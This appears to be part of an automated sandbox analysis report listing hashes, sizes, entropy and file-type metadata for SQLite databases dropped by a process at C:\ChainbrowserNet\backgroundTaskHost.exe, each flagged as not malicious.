                                                                                          SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):106496
                                                                                          Entropy (8bit):1.1358696453229276
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):106496
                                                                                          Entropy (8bit):1.1358696453229276
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):106496
                                                                                          Entropy (8bit):1.1358696453229276
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):106496
                                                                                          Entropy (8bit):1.1358696453229276
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                          Category:dropped
                                                                                          Size (bytes):40960
                                                                                          Entropy (8bit):0.8553638852307782
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):20480
                                                                                          Entropy (8bit):0.5712781801655107
                                                                                          Encrypted:false
                                                                                          SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                          MD5:05A60B4620923FD5D53B9204391452AF
                                                                                          SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                          SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                          SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                          Category:dropped
                                                                                          Size (bytes):40960
                                                                                          Entropy (8bit):0.8553638852307782
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):20480
                                                                                          Entropy (8bit):0.5707520969659783
                                                                                          Encrypted:false
                                                                                          SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                          MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                          SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                          SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                          SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):106496
                                                                                          Entropy (8bit):1.1358696453229276
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                          Category:dropped
                                                                                          Size (bytes):40960
                                                                                          Entropy (8bit):0.8553638852307782
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):106496
                                                                                          Entropy (8bit):1.1358696453229276
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):20480
                                                                                          Entropy (8bit):0.5707520969659783
                                                                                          Encrypted:false
                                                                                          SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                          MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                          SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                          SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                          SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                          Category:dropped
                                                                                          Size (bytes):28672
                                                                                          Entropy (8bit):2.5793180405395284
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                          MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                          SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                          SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                          SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                          Category:dropped
                                                                                          Size (bytes):114688
                                                                                          Entropy (8bit):0.9746603542602881
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                          Category:dropped
                                                                                          Size (bytes):40960
                                                                                          Entropy (8bit):0.8553638852307782
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                          Category:dropped
                                                                                          Size (bytes):40960
                                                                                          Entropy (8bit):0.8553638852307782
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                          Category:dropped
                                                                                          Size (bytes):40960
                                                                                          Entropy (8bit):0.8553638852307782
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):106496
                                                                                          Entropy (8bit):1.1358696453229276
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                          Category:dropped
                                                                                          Size (bytes):40960
                                                                                          Entropy (8bit):0.8553638852307782
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):106496
                                                                                          Entropy (8bit):1.1358696453229276
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                          Category:dropped
                                                                                          Size (bytes):28672
                                                                                          Entropy (8bit):2.5793180405395284
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                          MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                          SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                          SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                          SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                          Category:dropped
                                                                                          Size (bytes):40960
                                                                                          Entropy (8bit):0.8553638852307782
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                          Category:dropped
                                                                                          Size (bytes):114688
                                                                                          Entropy (8bit):0.9746603542602881
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                          Category:dropped
                                                                                          Size (bytes):114688
                                                                                          Entropy (8bit):0.9746603542602881
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):20480
                                                                                          Entropy (8bit):0.5712781801655107
                                                                                          Encrypted:false
                                                                                          SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                          MD5:05A60B4620923FD5D53B9204391452AF
                                                                                          SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                          SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                          SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                          Category:dropped
                                                                                          Size (bytes):114688
                                                                                          Entropy (8bit):0.9746603542602881
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                          Category:dropped
                                                                                          Size (bytes):114688
                                                                                          Entropy (8bit):0.9746603542602881
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):106496
                                                                                          Entropy (8bit):1.1358696453229276
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                          Category:dropped
                                                                                          Size (bytes):114688
                                                                                          Entropy (8bit):0.9746603542602881
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
